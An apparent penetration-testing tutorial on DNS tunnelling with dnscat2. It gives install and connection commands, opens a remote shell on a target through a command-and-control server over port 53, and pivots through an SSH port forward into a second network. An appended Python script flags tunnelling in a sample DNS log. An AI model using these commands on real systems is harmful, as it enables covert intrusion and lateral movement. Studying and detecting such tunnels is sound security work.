In this article, we learn DNS tunnelling through an amazing tool, DNScat2.
Table of Contents:
· Introduction to DNS
· Introduction to DNScat
· Installation
· DNS tunnelling
· Conclusion
Introduction to DNS
The Domain Name System (DNS) associates domain names with their IP addresses. With DNS it is possible to type words rather than a series of numbers into a browser, which lets people look up sites and send messages using familiar names. When you enter a domain name in a browser, it sends a query to the DNS server to match the domain with its IP address. Once found, the browser uses that IP address to retrieve the site's content. Remarkably, this whole procedure takes only milliseconds. All of this happens over port 53.
Introduction to DNScat
DNScat is a well-regarded tool because it can create a command and control tunnel over the DNS protocol, which lets an attacker work in stealth mode. Through it you can access data, upload and download files, and get a shell. For the tool to work over port 53 you do not need authoritative access to a DNS server: you can simply establish your connection directly over port 53, which is faster and is still seen as ordinary traffic. However, it does leave clear traces in packet logs.
DNScat is made of two components, a server and a client. To understand how dnscat works, it is important to understand both of these components.
The client is intended to run on a target machine. It is written in C and has minimal prerequisites. When you run the client, you normally specify a domain name. All packets are sent to the local DNS server, which then forwards them to the authoritative DNS server for that domain (which you, presumably, control).
The server is intended to run on an authoritative DNS server. It is developed in Ruby and depends on a few gems. When you run it, much like the client, you specify which domain(s) it listens for on port 53. When it receives traffic for one of those domains, it attempts to set up a legitimate connection. Other traffic is ignored by default, although the server can also be configured to forward it upstream.
Installation
Run the following git command to download dnscat2:
git clone https://github.com/iagox86/dnscat2.git
Now install bundler, as it is a major dependency for dnscat2. To install bundler, go into the server directory of dnscat2 and type:
gem install bundler
bundle install
Once everything is done, the server will run with the following command:
ruby dnscat2.rb
Similarly, download dnscat2 on the client machine too, and use the make command in the client directory to compile it, as shown in the image below:
To establish a connection between client and server, use the following command (the client binary built by make is named dnscat, and the server address and port are passed as comma-separated options to --dns):
./dnscat --dns server=192.168.174.131,port=53
Once the connection is established, the server side shows a new session, as in the image below. Use the command ‘sessions’ to list the sessions that have been created.
To interact with the said session, type the following command:
session -i 1
Now that you are in the session, use the command ‘ping’ to ping the target; if it replies ‘Pong!’, your ping was successful.
The following will be the response on the client side of the ping command.
With the help command you can see all the options available. If you want a shell, just type ‘shell’ and it will open a new window with a session to interact with the shell of the target system.
To interact with the shell session that is opened in a new terminal, type the following set of commands:
windows
session -i 2
Once you are in the session, you can execute any shell command, such as ‘uname -a’ as shown in the image above.
DNS tunnelling
DNS tunnelling is the most powerful use of DNScat2. If ifconfig shows two networks on your target system, as in the image below, you can easily perform DNS tunnelling.
For DNS tunnelling, type the following command:
listen 127.0.0.1:888 10.0.0.10:22
Now you can try to connect to the SSH port with the following command:
ssh cell@127.0.0.1 -p 888
Then, once connected, you can use the ‘ifconfig’ command to see the network you have tunnelled into, as shown in the following image:
As you now have SSH access to the second network too, you can download DNScat2 on that network as well in order to attack it. Once DNScat2 is downloaded there, type the following command to run it and get a session on the DNScat2 server (the same --dns option syntax as the Linux client):
dnscat2.exe --dns server=192.168.174.131,port=53
Once the above command is executed, you will have a new session that you can access with the following set of commands:
sessions
session -i 2
And once you have access to the session, you can run any command.
Conclusion
Even in the most restricted environments, DNS traffic is usually permitted so that internal or external names can be resolved. This can be used as a communication channel between a target host and the command and control server. Commands and data are carried inside DNS queries and responses, which is why detection is difficult: arbitrary commands hide in plain sight because the traffic is perceived as legitimate. This is exactly what DNSCat takes advantage of, making it an effective attack tool.
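Because the conclusion stresses that tunnelled commands hide inside ordinary-looking queries, the defender's counter is to look at the queries themselves. The following Python is an added example, not code from the article or from the dnscat2 project: it runs simple heuristics (very long names, long hex-looking labels, high-entropy subdomain data, and the TXT/CNAME/MX record types a tunnel tends to use) over a constructed DNS query log. The log format, the domain tunnel.example.net and the thresholds are all assumptions for illustration.

```python
import math
import re
from collections import Counter

# Constructed sample query log (time, client, qtype, qname); not from the article.
SAMPLE_LOG = """\
10:00:01 10.0.0.5 A www.example.com
10:00:02 10.0.0.5 TXT 6e2e8e0a3f1c9b7d2a4e5f6061728394a5b6c7d8e9f0.a1b2c3d4e5f60718293a4b5c6d7e8f90.tunnel.example.net
10:00:02 10.0.0.5 CNAME 7b1f00a9c3d5e7f9b2c4d6e8fa0c2e4f60718293a4b5c6d7.tunnel.example.net
10:00:03 10.0.0.9 AAAA mail.example.org
10:00:03 10.0.0.5 MX 0d1c2b3a49586776a5b4c3d2e1f0ffee.ddccbbaa99887766.tunnel.example.net
10:00:04 10.0.0.7 A cdn.static-assets.example.com
"""

HEX_LABEL = re.compile(r"^[0-9a-f]{20,}$")   # assumed: tunnel data shows up as long hex labels
TUNNEL_TYPES = {"TXT", "CNAME", "MX"}         # record types that can carry larger answers

def shannon_entropy(s):
    """Bits of entropy per character; random-looking hex scores close to 4."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def score_query(qtype, qname):
    """Return the heuristic reasons a single query looks like DNS tunnelling."""
    labels = qname.lower().rstrip(".").split(".")
    payload = "".join(labels[:-2])   # everything below the registrable domain
    reasons = []
    if len(qname) > 80:               # assumed threshold; normal names are far shorter
        reasons.append("long-name")
    if any(HEX_LABEL.match(label) for label in labels):
        reasons.append("hex-label")
    if len(payload) >= 30 and shannon_entropy(payload) > 3.5:
        reasons.append("high-entropy")
    if qtype in TUNNEL_TYPES and reasons:
        reasons.append("tunnel-rrtype")
    return reasons

def flag_tunnelling(log_text):
    """Parse log lines and return (client, qtype, qname, reasons) for suspicious queries."""
    flagged = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue                   # skip malformed lines rather than crash
        _, client, qtype, qname = parts
        reasons = score_query(qtype, qname)
        if reasons:
            flagged.append((client, qtype, qname, reasons))
    return flagged

if __name__ == "__main__":
    for client, qtype, qname, reasons in flag_tunnelling(SAMPLE_LOG):
        print(client, qtype, qname[:40] + "...", reasons)
```

In practice these heuristics are a triage filter, not a verdict: count flagged queries per client and per domain over time, since a tunnel produces a steady stream of them while a legitimate service rarely does.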